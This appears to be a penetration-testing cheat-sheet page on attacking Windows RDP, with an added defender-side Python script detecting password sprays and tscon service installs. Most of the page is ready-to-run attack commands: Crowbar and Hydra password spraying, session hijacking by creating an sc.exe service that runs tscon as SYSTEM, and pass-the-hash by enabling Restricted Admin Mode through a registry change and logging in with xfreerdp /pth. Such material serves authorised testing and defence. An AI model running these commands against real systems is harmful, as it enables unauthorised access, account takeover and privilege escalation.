# RDP

By default, RDP listens on port `TCP/3389`.

```bash
nmap -Pn -p3389 <IP>
```

## Misconfigurations

Since RDP authenticates with user credentials, one common attack vector against the RDP protocol is password guessing. Although rare, an RDP service may also be reachable without a password when it is misconfigured.

Using the [Crowbar](https://github.com/galkan/crowbar) tool, we can perform a password spraying attack against the RDP service.

```bash
crowbar -b rdp -s <IP>/32 -U users.txt -c 'password123'
```

We can also use `Hydra` to perform an RDP password spray attack.

```bash
hydra -L usernames.txt -p 'password123' <IP> rdp
```

We can RDP into the target system using the `rdesktop` client or `xfreerdp` client with valid credentials.

```bash
rdesktop -u admin -p password123 <IP>
```

## Protocol Specific Attacks

**RDP Session Hijacking**

If a user is connected via RDP to our compromised machine, we can hijack the user's remote desktop session to escalate our privileges and impersonate the account. In an Active Directory environment, this could result in us taking over a Domain Admin account or furthering our access within the domain.

Find the logged-in sessions by using:

```powershell
query user
```

To successfully impersonate a user without their password, we need to have `SYSTEM` privileges and use the Microsoft [tscon.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon) binary that enables users to connect to another desktop session.

```cmd-session
tscon <target_session_id> /dest:<our_session_name>
```

If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz). A simple trick is to create a Windows service, which by default runs as `Local System`, so that any binary it launches executes with `SYSTEM` privileges. We will use the Microsoft [sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary.

```batch
REM sc.exe requires the space after "binpath=", otherwise the parameter is rejected.
REM The first argument to tscon is the session ID to take over; /dest: is our own session name.
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_id> /dest:<our_session_name>"
net start sessionhijack
```
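As an added defender-side example (not part of the original page), the following Python scans constructed Windows event records for the two patterns this page describes: RDP logon failures (Security Event ID 4625 with logon type 10) from one source against many accounts, which is what a Crowbar or Hydra spray produces, and a service installation (System Event ID 7045) whose image path invokes `tscon`, as in the `sc.exe create sessionhijack` trick. All event records, account names and IP addresses below are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed sample events. A real feed would come from exported Security
# (4625: failed logon) and System (7045: new service installed) event logs.
EVENTS = [
    {"id": 4625, "user": "alice", "logon_type": 10, "src": "10.10.14.5"},
    {"id": 4625, "user": "bob", "logon_type": 10, "src": "10.10.14.5"},
    {"id": 4625, "user": "carol", "logon_type": 10, "src": "10.10.14.5"},
    {"id": 4625, "user": "dave", "logon_type": 10, "src": "10.10.14.5"},
    {"id": 4625, "user": "Alice", "logon_type": 10, "src": "10.10.14.5"},  # same account, different case
    {"id": 4625, "user": "erin", "logon_type": 3, "src": "10.10.14.9"},    # network logon, not RDP
    {"id": 7045, "service": "sessionhijack", "account": "LocalSystem",
     "image_path": "cmd.exe /k tscon 2 /dest:rdp-tcp#13"},
    {"id": 7045, "service": "MyBackup", "account": "LocalSystem",
     "image_path": "C:\\Tools\\backup.exe"},
]

# tscon <session id> /dest:<session name>; the session name may contain '#'.
TSCON_RE = re.compile(r"tscon\s+(\d+)\s+/dest:(\S+)", re.IGNORECASE)


def detect_rdp_spray(events, min_users=3):
    """Return {source_ip: [accounts]} for sources whose RDP (logon type 10)
    failures hit at least min_users distinct accounts: one password, many users."""
    users_by_src = defaultdict(set)
    for e in events:
        if e["id"] == 4625 and e.get("logon_type") == 10:
            users_by_src[e["src"]].add(e["user"].lower())
    return {src: sorted(u) for src, u in users_by_src.items() if len(u) >= min_users}


def detect_tscon_service(events):
    """Return service installs whose image path runs tscon, with the session
    being taken over and the destination session parsed out when present."""
    hits = []
    for e in events:
        if e["id"] != 7045 or "tscon" not in e.get("image_path", "").lower():
            continue
        m = TSCON_RE.search(e["image_path"])
        target, dest = (m.group(1), m.group(2)) if m else (None, None)
        hits.append({"service": e["service"], "target_session": target,
                     "dest_session": dest, "account": e.get("account")})
    return hits


if __name__ == "__main__":
    print(detect_rdp_spray(EVENTS))
    print(detect_tscon_service(EVENTS))
```

A legitimate `tscon` use is rare enough that any 7045 event carrying it, especially as `cmd.exe /k tscon ...`, deserves a look; correlating with Event ID 4778 (session reconnected) confirms the takeover.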

## PtH RDP

Pass-the-hash over RDP, authenticating with a user's NTLM hash instead of their cleartext password, has a few caveats:

* `Restricted Admin Mode`, which is disabled by default, should be enabled on the target host; otherwise, we will be prompted with the following error:

<figure><img src="/files/z51cCv2xPXr5LvtXLYRW" alt="Error shown when Restricted Admin Mode is disabled on the target"><figcaption></figcaption></figure>

Restricted Admin Mode can be enabled by adding a new registry value named `DisableRestrictedAdmin` (type `REG_DWORD`, data `0`) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa`. This can be done with the following command:

```powershell
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

Once the registry key is added, we can use `xfreerdp` with the option `/pth` to gain RDP access:

```shell-session
xfreerdp /v:<IP> /u:lewen /pth:<Hash>
```

If it works, we'll now be logged in via RDP as the target user without knowing their cleartext password.

Keep in mind that this will not work against every Windows system we encounter, but it is always worth trying when we have an NTLM hash, know the user has RDP rights on a machine or set of machines, and GUI access would help us toward the goal of our assessment.

